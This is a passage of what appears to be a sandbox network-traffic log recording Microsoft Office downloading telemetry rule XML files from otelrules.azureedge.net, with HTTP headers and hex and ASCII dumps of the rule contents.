                                            x-ms-request-id: 1d8bef7c-801e-002a-176f-3731dc000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201656Z-164f84587bf7jb9dhC1DFWkay400000005yg00000000cqng
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:56 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            125192.168.2.44987613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:56 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:56 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:56 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1366
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                            ETag: "0x8DC582BDB779FC3"
                                            x-ms-request-id: 70ecc3c7-201e-005d-13af-36afb3000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201656Z-16547b76f7fbkfmzhC1DFWm9tw00000005t0000000011nae
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:56 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            126192.168.2.44987713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:56 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:56 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:56 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1397
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                            ETag: "0x8DC582BDFD43C07"
                                            x-ms-request-id: bbb23919-f01e-005d-46d2-3713ba000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201656Z-16547b76f7fsq6p7hC1DFWfx6800000004ug000000002pe3
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:56 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            127192.168.2.44987913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:57 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:57 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:57 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1427
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                            ETag: "0x8DC582BE56F6873"
                                            x-ms-request-id: 73840edb-001e-0034-7def-39dd04000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201657Z-16547b76f7fgfpmjhC1DFWw6ec00000005ng00000000xpkf
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:57 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            128192.168.2.44987813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:57 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:57 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:57 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1360
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                            ETag: "0x8DC582BDD74D2EC"
                                            x-ms-request-id: 4901c883-e01e-0020-44af-36de90000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201657Z-16547b76f7fr5rfnhC1DFW0am400000003p000000000ycd2
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:57 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            129192.168.2.44988013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:57 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:57 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:57 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1390
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                            ETag: "0x8DC582BE3002601"
                                            x-ms-request-id: 258ea299-f01e-0096-72c4-3710ef000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201657Z-16547b76f7fwggrphC1DFW2a8s000000053g00000000sw4x
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:57 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            130192.168.2.44988113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:57 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:57 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:57 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1401
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                            ETag: "0x8DC582BE2A9D541"
                                            x-ms-request-id: 10622547-201e-0085-529f-3734e3000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201657Z-16547b76f7fxqj4khC1DFWpypw00000003pg00000000azk0
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:57 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            131192.168.2.44988213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:57 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:57 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:57 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1364
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                            ETag: "0x8DC582BEB6AD293"
                                            x-ms-request-id: 56128767-e01e-0071-6e9b-3808e7000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201657Z-16547b76f7fpdsp9hC1DFW8f5000000003x000000000apt1
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:57 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            132192.168.2.44988413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:57 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:58 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:58 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1354
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                            ETag: "0x8DC582BE0662D7C"
                                            x-ms-request-id: 01685b32-c01e-00a1-6c98-387e4a000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201658Z-1866b5c5fbbb9dv9hC1DFWps5c00000001a000000000vswh
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:58 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            133192.168.2.44988313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:57 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:58 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:58 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1391
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                            ETag: "0x8DC582BDF58DC7E"
                                            x-ms-request-id: e3d9936e-401e-0083-0609-37075c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201658Z-1866b5c5fbbb286shC1DFWx97800000002r000000000hw60
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:58 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            134192.168.2.44988513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:58 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:58 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:58 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1403
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                            ETag: "0x8DC582BDCDD6400"
                                            x-ms-request-id: e00571ae-f01e-0052-6cd2-379224000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201658Z-16547b76f7fkf5v9hC1DFW2y5s0000000670000000007te4
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:58 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            135192.168.2.44988613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:58 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:58 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:58 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1366
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                            ETag: "0x8DC582BDF1E2608"
                                            x-ms-request-id: 9eb36ff5-301e-0099-1bac-386683000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201658Z-164f84587bfmxxfphC1DFW3au800000004ng00000000t324
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
